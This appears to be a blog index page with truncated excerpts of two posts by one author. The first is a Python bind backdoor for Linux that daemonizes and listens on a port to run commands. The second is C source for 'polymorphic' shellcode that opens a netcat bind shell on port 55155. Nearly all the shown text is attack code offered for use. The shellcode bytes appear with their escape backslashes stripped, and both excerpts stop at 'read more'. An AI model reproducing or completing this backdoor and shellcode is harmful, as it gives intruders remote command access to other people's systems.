Bind Backdoor for Linux
#!/usr/bin/python #Info : This is a linux based bind backdoor and # this is NOT an interactive Shell! #Author : otoy #Date : 0x102010 #Blog : otoyrood.wordpress.com import socket,sys,os,re def daemonize(): pid = os.fork() if(pid != 0): os._exit(0) def main(): if len(sys.argv) < 2: print "Usage:",sys.argv[0],"<port>" sys.exit(1) UID = os.getlogin() CWD = os.getcwd() STM = os.uname() if UID == 'root': SIGN = ' # ' else: SIGN = ' $ ' ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM); port = int(sys.argv[1]) ls.bind(('',...
read more86 Bytes – Polymorphic “netcat bindport 55155″ Shellcode
/* Name : 86 bytes "polymorphic - netcat bindport 55155" Info : this shellcode create a bindport 55155 with netcat Author : otoy Blog : http://otoyrood.wordpress.com Date : August 2010 Tested on: ubuntu 8.04 & Backtrack 4 */ #include char shellcode[] = "xebx13x5ex31xc9xb1x3cx80x2ex45x80x36x45x80x06" "x45x46xe2xf4xebx05xe8xe8xffxffxffxeex83x46x7d" "x93xabxb1xf4xb1xa0xabxf4xf4x9dxa6x46x20x93xab" "xfaxeexfaxfaxabxf2xa7xb3xfax46x1ex93xabxf4xf4" "xb0xabxabxf4x9dxa6xb1xabxf2xa0xf4xf4x46x1dx93" "x73xc8x8dx8ex90x46x1exeex0dx12xc3"; int main(void) { fprintf(stdout,"[*]...
read more